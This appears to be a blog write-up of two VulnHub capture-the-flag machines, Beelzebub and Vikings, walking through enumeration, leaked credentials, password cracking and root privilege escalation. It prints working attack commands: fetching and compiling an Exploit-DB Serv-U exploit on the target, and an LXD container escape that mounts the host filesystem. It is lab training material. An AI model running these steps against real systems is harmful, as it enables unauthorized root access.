I did BEELZEBUB: 1 and VIKINGS: 1 from VulnHub.

Ports

Both of these boxes were HTTP and SSH only; I’ll mention Beelzebub first since it is freshest in my mind.

HTTP

Doing a GET on /index.php seemingly returns a 404 but hidden in the source code for that page is a comment. We realise something is different because dirbuster shows it’s actually a 200 status:

[03:10:48] 200 - 271B - /index.php

The page says:

404 Not Found

In the source is:

My heart was encrypted, “beelzebub” somehow hacked and decoded it.-md5

The MD5 of “beezlebub” is d18e1e22becbd915b45e0e655429d487, and this is a directory with a wordpress installation. I should note at this point the box kept trying to redirect to 192.168.1.6, presumably this was the IP the creator used. My DHCP server assigned it 192.168.1.86, and I had all manner of problems. Fortunately I had 192.168.1.6 free, so I assigned it as a static IP for this address.

wpscan

┌──(root💀kali)-[/opt/vulnhub/beezlebub]
└─# wpscan -e --url http://192.168.1.6/d18e1e22becbd915b45e0e655429d487/ --api-token GET_YOUR_OWN 

This shows us, amongst other things:

[i] User(s) Identified:

[+] krampus
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.1.6/d18e1e22becbd915b45e0e655429d487/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] valak
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Some manual enumeration leads us to http://beezlebub/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/Talk%20To%20VALAK/index.php where we can enter commands to ‘talk’ to Valak. These just get echoed back and it doesn’t seem like we can inject. However if we check Burp, we do get a cookie:

Password=M4k3Ad3a1

Interesting! The box has phpmyadmin; doesn’t work there. Tried wordpress login; nope. SSH? Yes.

┌──(root💀kali)-[/opt/vulnhub/beezlebub]
└─# ssh krampus@192.168.1.6                                                               
krampus@192.168.1.6s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

388 packages can be updated.
266 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Sat Mar 20 00:38:04 2021 from 192.168.1.7

Since we’re here, let’s look at the Valak thing:

if (isset($_POST['name']) && ! empty($_POST['name'])) {
  $name = $_POST['name'];
  setcookie('Password', 'M4k3Ad3a1');
} else {
  $name = isset($_COOKIE['name']) ? $_COOKIE['name'] : '';
}

Doesn’t seem like we had to do anything special to trigger this.

Privesc

Our user left his bash_history showing how to privesc - not sure if intentionally or not! Anyway, we have Serv-U installed, and we can get root with it:

krampus@beelzebub:/dev/shm$ wget https://www.exploit-db.com/download/47009
--2021-09-12 13:29:46--  https://www.exploit-db.com/download/47009
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 619 [application/txt]
Saving to: ‘47009’

47009                                   100%[===============================================================================>]     619  --.-KB/s    in 0s      

2021-09-12 13:29:46 (113 MB/s) - ‘47009’ saved [619/619]

krampus@beelzebub:/dev/shm$ mv 47009 ./exploit.c
krampus@beelzebub:/dev/shm$ gcc exploit.c -o exploit
krampus@beelzebub:/dev/shm$ ./exploit 
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)
opening root shell
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)
beelzebub
Sun Sep 12 13:30:06 IST 2021
# cd /root
# ls -lash
total 44K
4.0K drwx------  6 root root 4.0K Sep 12 13:10 .
4.0K drwxr-xr-x 24 root root 4.0K Mar 16 18:14 ..
4.0K -rw-------  1 root root 1.2K Mar 20 01:01 .bash_history
4.0K drwx------  2 root root 4.0K Mar 21 04:39 .cache
4.0K drwx------  5 root root 4.0K May 27  2020 .config
4.0K drwx------  3 root root 4.0K Mar 19 23:44 .gnupg
4.0K drwxr-xr-x  3 root root 4.0K Oct 20  2019 .local
4.0K -rw-------  1 root root  893 Mar 19 16:54 .mysql_history
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   33 Mar 19 17:28 root.txt
4.0K -rw-r--r--  1 root root   66 Apr  2  2020 .selected_editor
# cat root.txt
8955qpasq8qq807879p75e1rr24cr1a5

There is actually a Metasploit module for this exploit too. Linpeas didn’t make a big deal out of Serv-U being present but it did notice some files associated with it, e.g.

/usr/local/Serv-U/Serv-U.Archive

Vikings

So this one you had to fuzz for a hidden file (war.txt) which led you to another path, which was a bunch of gibberish. Actually it was a password protected ZIP file which had then been base64 encoded. I downloaded it with curl, then decoded it and sent it through zip2john before cracking the password. I didn’t take notes while I was doing it, but that was the process.

By the way, someone asked me for a hint on this via discord after I posted to root proof lol. Anyway, inside the ZIP file was a JPEG, which then had another ZIP file hidden inside which you could extract with binwalk.

┌──(root💀kali)-[/opt/vulnhub/vikings/_king.extracted]
└─# ls -lash
total 20K
4.0K drwxr-xr-x 2 root root 4.0K Sep 10 23:12 .
4.0K drwxr-xr-x 4 root root 4.0K Sep 10 23:11 ..
4.0K -rw-r--r-- 1 root root  195 Sep 10 23:11 15D03F.zip
4.0K -rw-r--r-- 1 root root   92 Sep  3 15:46 user
4.0K -rw-r--r-- 1 root root   92 Sep  3 06:16 user_1
                                                                     
┌──(root💀kali)-[/opt/vulnhub/vikings/_king.extracted]
└─# cat user          
//FamousBoatbuilder_floki@vikings                                     
//f@m0usboatbuilde7 

And there are our SSH creds, for floki.

privesc

Now it seems the creator of this box probably intended for us to do this move to another user with some more CTFy stuff, but he/she also left our user as part of the LXD group. So why not use it?

floki@vikings:/tmp$ lxc image import alpine-v3.14-x86_64-20210910_2324.tar.gz --alias alpine
Image imported with fingerprint: 1b9b6768ec27c8c3e20e09ccd8c1f3bc6a4a9e55b0a858926545c4ad3c88562b
floki@vikings:/tmp$ lxc image list
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| alpine | 1b9b6768ec27 | no     | alpine v3.14 (20210910_23:24) | x86_64 | 3.10MB | Sep 11, 2021 at 3:29am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
floki@vikings:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]: whatever
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]: something
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
Error: Failed to create network 'something': open /proc/sys/net/ipv6/conf/something/autoconf: no such file or directory
floki@vikings:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
floki@vikings:/tmp$ lxc list
+---------+---------+------+------+------------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| privesc | STOPPED |      |      | PERSISTENT | 0         |
+---------+---------+------+------+------------+-----------+
floki@vikings:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
floki@vikings:/tmp$ lxc start privesc
floki@vikings:/tmp$ lxc exec privesc /bin/sh
~ # cd /mnt/root/root
/mnt/root/root # id;hostname;date
uid=0(root) gid=0(root)
privesc
Sat Sep 11 03:31:25 UTC 2021
/mnt/root/root # cat root.txt
f0b98d4387ff6da77317e582da98bf31
/mnt/root/root #

Now I suppose this was unintended, but hackers gonna hack, amirite? The only funny thing was both curl and wget didn’t seem to work on this machine. scp was fine though….

┌──(root💀kali)-[/opt/vulnhub/vikings/_king.extracted]
└─# scp /opt/scripts/alpine-v3.14-x86_64-20210910_2324.tar.gz floki@192.168.1.96:/tmp/alpine-v3.14-x86_64-20210910_2324.tar.gz
floki@192.168.1.96's password: 
alpine-v3.14-x86_64-20210910_2324.tar.gz     100% 3177KB  94.5MB/s   00:00